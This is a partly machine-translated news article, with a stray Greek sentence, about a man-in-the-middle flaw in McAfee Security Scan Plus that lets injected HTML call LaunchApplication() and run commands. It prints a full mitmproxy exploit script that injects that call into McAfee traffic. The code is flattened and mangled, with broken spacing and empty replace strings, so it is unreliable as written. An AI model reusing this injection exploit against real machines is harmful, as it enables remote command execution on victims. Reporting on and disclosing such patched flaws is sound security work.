McAfee Security Scan Plus: From this site you have read many times about security companies' negligence. McAfee's time has come. The company is reportedly repairing one error that exists in free εργαλείο Security Scan Plus που ανακτά πληροφορίες από τους υπολογιστές των ενδιαφερομένων μέσω HTTP, δηλαδή σε μορφή απλού κειμένου.
The company seems to have forgotten what it preaches, or assumed that it is excluded that one thinks of man-in-the-middle attacks on its services, such as free online scanning, but also internal ads and the UI that displays them.
The vulnerability was discovered by SecuriTeam, which states that the McAfee tool "retrieves information from different mcafee.com domains and displays it to the user, usually in the main application window".
Since the HTTPS protocol is not used to transfer this information, the information can be modified by an attacker who can then take advantage of the library calling the tool (MCBRWSR2.DLL) to display that HTML content wish.
This library exposes the JavaScript LaunchApplication () API, which very simply means that an attacker can execute any command he wants the victim to.
The McAfee Security Scan Plus program, after each scan, displays a UI that indicates the target's "level of protection" at the following URL:
http://home.mcafee.com/SecurityScanner/SSBanner.aspx
The information appears on screen progress of the online scan, and thus the user can easily think that their computer is clean, when in fact it has just been compromised.
If you are now in the attacker's shoes, and performing a MITM attack, it is quite easy to run commands with the privileges of the logged in user, which in many cases is yourself account with that of the administrator.
Full PoC needs only 38 code lines. McAfee recognized the issue here and repaired the service in July.
See the PoC code
#! / usr / bin / env python3 # # HTTP proxy mode: # mitmproxy -s mcsploit_inline.py --ignore '. *' # # Transparent proxy mode: # mitmproxy -s mcsploit_inline.py -T # from mitmproxy import ctx, http import requests import time COMMAND = "c: \\\\ windows \\\\ system32 \\\\ calc.exe" CMDARGS = "" def response (flow): if flow.request.scheme == "http" and (flow.request.headers ['host']. endswith ("mcafee.com") or "mcafee" in flow.request.url): if flow.response.status_code == 302: ctx.log ("[+] [MCSPLOIT] Insecure McAfee request found! (HTML) ") https_url = flow.request.url.replace (" http: // "," https: // ") r = requests.get (https_url, headers = flow.request .headers, verify = False) if "text / html" not in r.headers ['content-type']: return contents = r.text contents = contents.replace ("", "" % (COMMAND, CMDARGS)) flow.response = http.HTTPResponse.make(200,bytes(contents,encoding="utf-8"),{"Content-Type": "text/html; charset=utf-8","Expires":"-1"}) return try: if flow.response.headers["content-type"] == "text/javascript": ctx.log("[+] [MCSPLOIT] Insecure McAfee request found! (JS)") inject="try{window.external.LaunchApplication(\"% s\",\"%s\");}catch(launchapperr){var x;}\n" % (COMMAND, CMDARGS) try: flow.response.contents = inject + flow.response.contents except AttributeError: ctx .log("[-] [MCSPLOIT] No content in the original response!") pass except KeyError: pass